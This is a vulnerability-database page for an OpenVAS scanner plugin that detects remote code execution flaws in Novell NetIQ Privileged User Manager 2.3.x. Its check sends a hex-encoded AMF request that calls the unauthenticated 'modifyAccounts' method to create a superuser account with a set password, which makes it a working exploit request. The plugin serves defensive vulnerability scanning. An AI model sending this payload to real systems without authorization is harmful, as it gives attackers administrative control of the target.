Lucene search

K
openvasCopyright (C) 2012 Greenbone AGOPENVAS:1361412562310802043
HistoryNov 21, 2012 - 12:00 a.m.

Novell NetIQ Privileged User Manager RCE Vulnerability

2012-11-2100:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
9

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.2 High

AI Score

Confidence

Low

0.799 High

EPSS

Percentile

98.3%

Novell NetIQ Privileged User Manager is prone to a remote code execution (RCE) vulnerability.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.802043");
  script_version("2024-06-28T05:05:33+0000");
  script_cve_id("CVE-2012-5930", "CVE-2012-5931", "CVE-2012-5932");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2024-06-28 05:05:33 +0000 (Fri, 28 Jun 2024)");
  script_tag(name:"creation_date", value:"2012-11-21 18:46:53 +0530 (Wed, 21 Nov 2012)");
  script_name("Novell NetIQ Privileged User Manager RCE Vulnerability");

  script_xref(name:"URL", value:"http://download.novell.com/protected/Summary.jsp?buildid=K6-PmbPjduA~");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56535");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56539");
  script_xref(name:"URL", value:"http://secunia.com/advisories/51291");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/22737");
  script_xref(name:"URL", value:"http://packetstormsecurity.org/files/118117");
  script_xref(name:"URL", value:"http://packetstormsecurity.org/files/118118");
  script_xref(name:"URL", value:"https://www.netiq.com/support/kb/doc.php?id=7011385");
  script_xref(name:"URL", value:"http://retrogod.altervista.org/9sg_novell_netiq_ii.htm");
  script_xref(name:"URL", value:"http://retrogod.altervista.org/9sg_novell_netiq_ldapagnt_adv.htm");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Web application abuses");
  script_require_ports("Services/www", 443);
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"impact", value:"Successful exploitation will allow attackers to execute perl code and
  change administrative credentials.");

  script_tag(name:"affected", value:"Novell NetIQ Privileged User Manager 2.3.0 and 2.3.1.");

  script_tag(name:"insight", value:"The flaws are due to an error in the 'ldapagnt' and 'auth' module due to not
  restricting access to certain methods, which can be exploited to execute
  perl code by passing arbitrary arguments to the Perl 'eval()' function
  via HTTP POST requests and attacker can change administrative credentials
  using the 'modifyAccounts()' function via HTTP POST requests.");

  script_tag(name:"solution", value:"Apply NetIQ Privileged User Manager 2.3.1 HF2 (2.3.1-2) or later.");

  script_tag(name:"summary", value:"Novell NetIQ Privileged User Manager is prone to a remote code execution (RCE) vulnerability.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default:443);

useragent = http_get_user_agent();
host = http_host_name(port:port);

res1 = http_get_cache(item:"/", port:port);

if(">NetIQ Privileged User Manager<" >< res1)
{
  post_data = '\x00\x00\x00\x00\x00\x01\x00\x13\x53\x50\x46\x2e\x55\x74\x69\x6c' +
              '\x2e\x63\x61\x6c\x6c\x4d\x61\x73\x74\x65\x72\x00\x04\x2f\x32\x36' +
              '\x32\x00\x00\x02\x98\x0a\x00\x00\x00\x01\x03\x00\x06\x6d\x65\x74' +
              '\x68\x6f\x64\x02\x00\x0e\x6d\x6f\x64\x69\x66\x79\x41\x63\x63\x6f' +
              '\x75\x6e\x74\x73\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61' +
              '\x75\x74\x68\x00\x04\x55\x73\x65\x72\x03\x00\x04\x6e\x61\x6d\x65' +
              '\x02\x00\x05\x6f\x76\x78\x79\x7a\x00\x09\x41\x43\x54\x5f\x53\x55' +
              '\x50\x45\x52\x03\x00\x05\x76\x61\x6c\x75\x65\x00\x3f\xf0\x00\x00' +
              '\x00\x00\x00\x00\x00\x06\x61\x63\x74\x69\x6f\x6e\x02\x00\x03\x73' +
              '\x65\x74\x00\x00\x09\x00\x0b\x41\x43\x54\x5f\x43\x4f\x4d\x4d\x45' +
              '\x4e\x54\x03\x00\x05\x76\x61\x6c\x75\x65\x02\x00\x04\x61\x73\x64' +
              '\x64\x00\x06\x61\x63\x74\x69\x6f\x6e\x02\x00\x03\x73\x65\x74\x00' +
              '\x00\x09\x00\x0a\x41\x43\x54\x5f\x50\x41\x53\x53\x57\x44\x03\x00' +
              '\x05\x76\x61\x6c\x75\x65\x02\x00\x05\x6f\x76\x74\x6d\x70\x00\x06' +
              '\x61\x63\x74\x69\x6f\x6e\x02\x00\x03\x73\x65\x74\x00\x00\x09\x00' +
              '\x08\x41\x43\x54\x5f\x44\x45\x53\x43\x03\x00\x05\x76\x61\x6c\x75' +
              '\x65\x02\x00\x03\x73\x64\x73\x00\x06\x61\x63\x74\x69\x6f\x6e\x02' +
              '\x00\x03\x73\x65\x74\x00\x00\x09\x00\x00\x09\x00\x03\x75\x69\x64' +
              '\x06\x00\x00\x09';

  req2 = string("POST ", "/", " HTTP/1.1\r\n",
                "User-Agent: ", useragent, "\r\n",
                "Host: ", host, "\r\n",
                "Accept: */*\r\n",
                "Cookie: _SID_=1;\r\n",
                "Content-Type: application/x-amf\r\n",
                "x-flash-version: 11,4,402,278\r\n",
                "Content-Length: ", strlen(post_data), "\r\n",
                "\r\n", post_data);
  res2 = http_keepalive_send_recv(port:port, data:req2);

  if('onResult\x00\x04null' >< res2 && 'Error\x00\x04code' >!< res2 &&
     ('You are not authorized to perform this operation' >!< res2 ||
      'No module available' >!<  res2)){
    security_message(port:port);
    exit(0);
  }
}

exit(99);

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.2 High

AI Score

Confidence

Low

0.799 High

EPSS

Percentile

98.3%

Related for OPENVAS:1361412562310802043